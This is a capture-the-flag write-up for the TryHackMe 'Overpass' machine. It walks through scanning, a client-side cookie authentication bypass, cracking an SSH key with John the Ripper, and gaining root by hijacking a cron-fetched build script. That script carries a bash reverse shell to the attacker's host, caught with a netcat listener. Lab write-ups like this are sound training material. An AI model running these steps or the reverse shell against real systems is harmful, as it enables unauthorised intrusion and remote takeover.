Overpass | THM

What happens when some broke Comp Sci students make a password manager? LET'S HACK...

++Scanning++

Let’s start with a simple Nmap scan:

nmap -sV -T4 -sC machine_IP -oN /output_scan_to_your_directory

Ports found: 22 (SSH) and 80 (HTTP), both common ports.

As port 80 is open, let’s check that first:

++HTTP++

We are greeted with a “welcome to overpass” page.

++SOURCE CODE++

It’s always good practice to check the source code of a site, so let’s check it. We can see a comment about their security (highlighted in green), hmm…
Now I decided to run directory brute forcing against this site and got some hits, one of which, a particular sub-directory, was interesting:

++GOBUSTER++

Exploring the directory:

I tried SQL injection, but had no luck with that.

So, moving forward with the source code, here is what I find interesting: there are a bunch of JavaScript files, including /login.js.
Let’s explore and find out:

++JAVA_SCRIPT++

Analyzing the code to see how it works:

So, the script checks for a session-token cookie and grants access based on it. Since no cookie is generated for us, we can supply our own cookie that matches the conditions.

++PLAYING WITH COOKIES++

Edit the cookie with the name SessionToken, literally any value, and path /.
Refresh the page and voilà, you have the SSH private key.
I’m pretty sure that SSH key will prompt for a passphrase (which we don’t know),
but cracking id_rsa should work, so I’m going to crack id_rsa with
JOHN THE RIPPER

++CRACKING SSH PASSWORD++

Commands:

  • convert the id_rsa key into a hash
    ssh2john [your_id_rsa.key] > hash.txt
  • crack hash.txt with John the Ripper
    john --wordlist=[your_wordlist] hash.txt

After logging in over SSH with the cracked key, we use a privesc enumeration tool and recon the box for useful directories.

++USER FLAG++

Going through every detail, we find a cron job that runs a buildscript.sh.

Now we replace the build script with our own reverse shell, i.e. we write a buildscript.sh containing a bash reverse shell (from GitHub):

bash -i >& /dev/tcp/Machine_IP/8080 0>&1

As we can see, the cron job fetches it with curl overpass.thm/downloads/src/buildscript.sh,
so we create exactly the same directory structure on our local machine. Before doing this, make sure you have edited the hosts file on the target so that overpass.thm points to your local machine IP.

++STARTING OUR PYTHON3 SERVER++

Start your Python HTTP server (python3 -m http.server 80) on port 80 on your local machine.

  • Netcat listener: start nc -lvnp 8080 (the port used in the reverse shell above).
Once the cron job runs and the shell connects back, cd into /root and we find the root flag.

++TAKEAWAY FROM THIS MACHINE++

This was an easy box from NinjaJc01.
It covers all the basics from enumeration to rooting the box, and even touches on the OWASP Top 10. This box made sure you check out the source of each directory. Phew… finally, thanks for reading!
Feel free to send me suggestions… cheers!

sw0rdf1sh

security researcher